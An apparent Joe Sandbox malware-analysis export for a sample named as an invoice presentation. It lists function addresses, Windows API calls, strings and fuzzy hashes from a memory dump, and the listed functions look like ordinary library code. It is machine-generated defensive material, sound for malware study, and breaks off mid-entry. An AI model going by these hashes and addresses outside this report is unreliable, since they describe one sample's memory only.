Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: EmptyH_prolog3_MessageRectSend
String ID: SysListView32
API String ID: 1451865993-78025650
Opcode ID: 58768314c1a4496030ca52039e3726c47988b4e65d42079a330b6265709315c8
Instruction ID: 53182bcb27f072075d6134593ebde9b03c54947f68ff4933b6ec9413f8a5d3a2
Opcode Fuzzy Hash: 58768314c1a4496030ca52039e3726c47988b4e65d42079a330b6265709315c8
Instruction Fuzzy Hash: 0911A170900309EBDB609FA48886AFAB6E4EB49310F14465DF225672E1CBB04E04CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00C00ED9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C00EE0
LoadCursorA.USER32 ref: 00C00F04
GetClassInfoA.USER32 ref: 00C00F3F

Part of subcall function 00BB7344: __EH_prolog3_catch.LIBCMT ref: 00BB734B
Part of subcall function 00BB7344: GetClassInfoA.USER32 ref: 00BB735D

Strings

%Ts:%x:%x:%x:%x, xrefs: 00C00F2A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClassInfo$CursorH_prolog3H_prolog3_catchLoad
String ID: %Ts:%x:%x:%x:%x
API String ID: 937286869-4057404147
Opcode ID: 494e2f472a4f1ce1a1f060feab5a8c1f22148728c9533b5562208438a754f0c6
Instruction ID: 14f817f155b8d698b762a421c856af4a269d1afb3ba6df771127efd589cf61c5
Opcode Fuzzy Hash: 494e2f472a4f1ce1a1f060feab5a8c1f22148728c9533b5562208438a754f0c6
Instruction Fuzzy Hash: 022115B0900209EFDB50EFA9D885BDDBAF4FB48310F10406AF904E3241D7B45A05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8EB8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBDF4F: LoadLibraryW.KERNEL32(?,00E19298,00000010,00BB7EDC,?,?,?,00000000), ref: 00BBDF90

GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00BC8EF7
FreeLibrary.KERNEL32(00000000,?,comctl32.dll), ref: 00BC8F43

Part of subcall function 00BC8EA5: GetLastError.KERNEL32(00000000,?), ref: 00BC8EA5

Strings

DllGetVersion, xrefs: 00BC8EF1
comctl32.dll, xrefs: 00BC8ED0

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Library$AddressErrorFreeLastLoadProc
String ID: DllGetVersion$comctl32.dll
API String ID: 2540614322-3857068685
Opcode ID: bc371a3da38104f49df8503899525847d88dc4a548993c3ce128728cd1182a68
Instruction ID: 3775e1f80f3bd51ba30900f2e7b5ee1a304274218b78a7004b5956ecb6679c24
Opcode Fuzzy Hash: bc371a3da38104f49df8503899525847d88dc4a548993c3ce128728cd1182a68
Instruction Fuzzy Hash: F8116D75A0021ADBCB11ABA8DC85FAEBBF5EF84711F1100ADE905A7340DF7499058B75

Uniqueness

Uniqueness Score: -1.00%

Function 00D725CB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00D72614
GetLastError.KERNEL32(?,?,?,00BAD671,?), ref: 00D72620
__dosmaperr.LIBCMT ref: 00D72627

Strings

@Mxt, xrefs: 00D72620

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID: @Mxt
API String ID: 2744730728-1922883433
Opcode ID: f8073781b3fae06b2b39ebac30ca81be952f61a3fa3823a25941aed9fd9d127e
Instruction ID: 28e9187812bf2cf7f742515c418a462bebeb776c48137120ee9c36970a24c56b
Opcode Fuzzy Hash: f8073781b3fae06b2b39ebac30ca81be952f61a3fa3823a25941aed9fd9d127e
Instruction Fuzzy Hash: 67015EB2500259EFDF159FA1DC05AAE3BB9EF10765F148159F80597250EB70CA50DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00B91050, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B91092
__Init_thread_footer.LIBCMT ref: 00B910BD

Part of subcall function 00D5929B: EnterCriticalSection.KERNEL32(00E49B40,?,?,?,00B91086,00E46220), ref: 00D592A6
Part of subcall function 00D5929B: LeaveCriticalSection.KERNEL32(00E49B40,?,?,?,00B91086,00E46220), ref: 00D592E3

__Init_thread_footer.LIBCMT ref: 00B9112F

Strings

$b, xrefs: 00B9111B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CriticalInit_thread_footerSection$EnterHeapLeaveProcess
String ID: $b
API String ID: 3363689876-394242954
Opcode ID: 3dfc2b006c836fc7cb9bb1d65917116ad643b4aa1896ecedb42ee2926850c6ff
Instruction ID: 8f4c3256cc30e6c20feb237bc4a55368fe292414f2679187149c6d0e3cafdaea
Opcode Fuzzy Hash: 3dfc2b006c836fc7cb9bb1d65917116ad643b4aa1896ecedb42ee2926850c6ff
Instruction Fuzzy Hash: 4A1119B9940741EFCB109B6AFC96A813BA0F307315F400668E915662B1D3F1648E8B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00BD63A5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BD63B5
SetEndOfFile.KERNEL32(?), ref: 00BD63F4
GetLastError.KERNEL32 ref: 00BD6401

Strings

@Mxt, xrefs: 00BD6401

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorFileLast_strlen
String ID: @Mxt
API String ID: 3081980862-1922883433
Opcode ID: 069657c21386a1bbfd23d94b5bcafc8f2c4d4e2b380cf67ce996b36e89d77f5a
Instruction ID: 8f64ebb15d0c3bd5d1f121d320d791f46519f096ef18fbb6d1edc81c947c4a72
Opcode Fuzzy Hash: 069657c21386a1bbfd23d94b5bcafc8f2c4d4e2b380cf67ce996b36e89d77f5a
Instruction Fuzzy Hash: 6B016231600218FBCB116B55DC49AAEBF99EF403B1B108066FD0997360DB31A961CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BB07D7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,00000000,00000010,?,?,00BB03D2,?,00000010), ref: 00BB07EA
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00BB07FA

Strings

Advapi32.dll, xrefs: 00BB07E5
RegDeleteKeyTransactedA, xrefs: 00BB07F4

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Advapi32.dll$RegDeleteKeyTransactedA
API String ID: 1646373207-1972538232
Opcode ID: 33ea3abefbe403cca55093ec68ea7230489e2973c9848cef1f3a1e788e030032
Instruction ID: bf1fd2fcb7f37f887b30756c3b3d73fbfcca3275dbdb99163fb728b0df25a7b5
Opcode Fuzzy Hash: 33ea3abefbe403cca55093ec68ea7230489e2973c9848cef1f3a1e788e030032
Instruction Fuzzy Hash: 03F01D32214609EF97213BA4AC84DB7BBEEEA847A6314417EE541C3211DAB18D11CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00BD601D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BD6030
GetProcAddress.KERNEL32(00000000,MoveFileTransactedA), ref: 00BD6040

Strings

MoveFileTransactedA, xrefs: 00BD603A
kernel32.dll, xrefs: 00BD602B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: MoveFileTransactedA$kernel32.dll
API String ID: 1646373207-3123790474
Opcode ID: 0ab7c31baeae39008d58138e88f92469b100c36271af314b6eba08983c6e6bb2
Instruction ID: 923b4b495089723937104ef8ad305a74734a62e285327942ec7f4046238a15a6
Opcode Fuzzy Hash: 0ab7c31baeae39008d58138e88f92469b100c36271af314b6eba08983c6e6bb2
Instruction Fuzzy Hash: 31F01D32244205EFAB251FA9AC889A6B7EDEB847A6714417BF64183350EA718C41D674

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9047, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 00BC9062
GetClassNameA.USER32(?,?,0000000A), ref: 00BC9077
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00BC908E

Strings

combobox, xrefs: 00BC907F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ClassCompareLongNameStringWindow
String ID: combobox
API String ID: 1414938635-2240613097
Opcode ID: 608662299fe0a3c5651eabdd299cbfac7aae6f81677ad3a413ad4f027e3b2b54
Instruction ID: 41377ae272ea0e940b510fe4048f330b9cd21566b43918da2aa59632725ae645
Opcode Fuzzy Hash: 608662299fe0a3c5651eabdd299cbfac7aae6f81677ad3a413ad4f027e3b2b54
Instruction Fuzzy Hash: DBF0A431654229EFDB00EB788D46EBE77A8EB16720F500719F432E71C1CA60990586A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4B4D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?), ref: 00BC4B72
GetProcAddress.KERNEL32(00000000,AfxmReleaseManagedReferences), ref: 00BC4B82

Strings

AfxmReleaseManagedReferences, xrefs: 00BC4B7C
mfcm140.dll, xrefs: 00BC4B66

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AfxmReleaseManagedReferences$mfcm140.dll
API String ID: 1646373207-3317825439
Opcode ID: 46a08119d3ecccf51d9028a4c1cc61ac656c294dd0ea807f0f37a378555bdd5d
Instruction ID: 7d552593239f3dd37fa4ff025bea26a521999faf73d07b43305d65cde229af79
Opcode Fuzzy Hash: 46a08119d3ecccf51d9028a4c1cc61ac656c294dd0ea807f0f37a378555bdd5d
Instruction Fuzzy Hash: CAF09072A0021AEB8B00EF699C44DAFBBFCFB19701300056EB806E7350CA70DD048AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2689, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,00BE2BC5,?,00000000,?,?), ref: 00BE26A0
GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedA), ref: 00BE26B0

Strings

GetFileAttributesTransactedA, xrefs: 00BE26AA
kernel32.dll, xrefs: 00BE269B

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetFileAttributesTransactedA$kernel32.dll
API String ID: 1646373207-3426858862
Opcode ID: 75b674cf280dd3932cc958c9a3716521563e54afd86b22bab9524f5139888c5e
Instruction ID: 97ce160e415f30c809378d8f12922c41260dab51fb35945aa5ce89447ac59d7f
Opcode Fuzzy Hash: 75b674cf280dd3932cc958c9a3716521563e54afd86b22bab9524f5139888c5e
Instruction Fuzzy Hash: 7BF03032200345DFDF211FA5EC98BAAB7DDEB14356F14466EF54182260DBB1CD50DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BE2D6B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00BE2D7C
GetProcAddress.KERNEL32(00000000,SetFileAttributesTransactedA), ref: 00BE2D8C

Strings

SetFileAttributesTransactedA, xrefs: 00BE2D86
kernel32.dll, xrefs: 00BE2D77

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: SetFileAttributesTransactedA$kernel32.dll
API String ID: 1646373207-2148319600
Opcode ID: d14f9db1df49cccaa0685211665fb4eb8f9e7892d504681bf4c2db8cd211fbf8
Instruction ID: 05af53122d843bc525bc8515d113c6a977041c9657254d795c09f14f73d22423
Opcode Fuzzy Hash: d14f9db1df49cccaa0685211665fb4eb8f9e7892d504681bf4c2db8cd211fbf8
Instruction Fuzzy Hash: A0F05436200204DBD7211B69EC1CBE67BE9EB84762F04847EEA42C3260DB718841DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6353, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,?), ref: 00BD6372
GetLastError.KERNEL32 ref: 00BD6380
GetLastError.KERNEL32 ref: 00BD638D

Strings

@Mxt, xrefs: 00BD6380, 00BD638D

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID: @Mxt
API String ID: 1156039329-1922883433
Opcode ID: d7449d76bf62e872620b37149b33c7b653b32c18aeaf8e569d7ade2f1c7cd6aa
Instruction ID: c867f5cf6ec9cb65bdbb85700677676e6ab456aedd4e7ccff9f643292f04acb1
Opcode Fuzzy Hash: d7449d76bf62e872620b37149b33c7b653b32c18aeaf8e569d7ade2f1c7cd6aa
Instruction Fuzzy Hash: 07F0A475900218EFCB109FA5DD498DEBBF8EB48360B10869AF825E3350D730EE009A61

Uniqueness

Uniqueness Score: -1.00%

Function 00BF22CD, Relevance: 6.2, APIs: 4, Instructions: 190windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF22D4
SendMessageA.USER32(?,000000B0,?,?), ref: 00BF22F8
SendMessageA.USER32(?,000000B0,?,?), ref: 00BF2311

Part of subcall function 00BA412F: _memcpy_s.LIBCMT ref: 00BA4195

Part of subcall function 00BF2737: __EH_prolog3.LIBCMT ref: 00BF273E

MessageBeep.USER32(000000FF), ref: 00BF24A2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Message$H_prolog3Send$Beep_memcpy_s
String ID:
API String ID: 2644258452-0
Opcode ID: ab59aa6d5afdc527dbd795860b188cf8a718f1cc9efa026806ffe0b4506baf43
Instruction ID: f1672c3890ea49646042959035dee9a8ed147ed30a64141a4a6493e959ad5469
Opcode Fuzzy Hash: ab59aa6d5afdc527dbd795860b188cf8a718f1cc9efa026806ffe0b4506baf43
Instruction Fuzzy Hash: 89713671900109EFCF05EBA4C995AFEB7F9BF18300F1444A9E916B7292DB746E08CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BFA87A, Relevance: 6.2, APIs: 4, Instructions: 177COMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 00BFA952
IsWindow.USER32(?), ref: 00BFA9A7
SetRectEmpty.USER32 ref: 00BFAA20
SetRectEmpty.USER32 ref: 00BFAA2A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: EmptyRect$Window
String ID:
API String ID: 1945993337-0
Opcode ID: 749075f3b5faa232628bdcba7cf793f43532767b2a057e7719a316ba85640384
Instruction ID: ab28fcb49dfb09b5c5793d2ff48edf284e0b154c680aca66c75a75170f18a544
Opcode Fuzzy Hash: 749075f3b5faa232628bdcba7cf793f43532767b2a057e7719a316ba85640384
Instruction Fuzzy Hash: 9B615D71A01609CFCB09DF64C984BAA77F9FF09314F0441A9EE19AF286D771A909CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00BFE67F, Relevance: 6.2, APIs: 4, Instructions: 162windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFE686
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00BFE76C
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00BFE817
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00BFE842

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageSend$H_prolog3InvalidateRect
String ID:
API String ID: 1245545628-0
Opcode ID: 828a8d90d4c514396327242ff7169fd0b173e8e047c9e98db84a2099d3313020
Instruction ID: fccd14b0942e9ab5260c747fb53a08f0b3a31393bc1f257b86b134be02f0c5c3
Opcode Fuzzy Hash: 828a8d90d4c514396327242ff7169fd0b173e8e047c9e98db84a2099d3313020
Instruction Fuzzy Hash: 72512D35600724CFDF15AB288C98BBD7BB1AF49720F1501A9E916EB3A1CF70AC45CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00BCEFAB, Relevance: 6.1, APIs: 4, Instructions: 145windowCOMMON

Download Yara Rule

APIs

__cftof.LIBCMT ref: 00BCF062
__cftof.LIBCMT ref: 00BCF0E2
__cftof.LIBCMT ref: 00BCF122
InsertMenuA.USER32(?,?,?,?,?), ref: 00BCF183

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: __cftof$InsertMenu
String ID:
API String ID: 1768687092-0
Opcode ID: 80c4bc02d440aa07794f9b0bebc28d92511f558d35d7e2c22487967b95a09c8a
Instruction ID: c8b4e0386ae24e4c8f9d3d6c1f7588c080368f27b2f3e02210be20824cb0718f
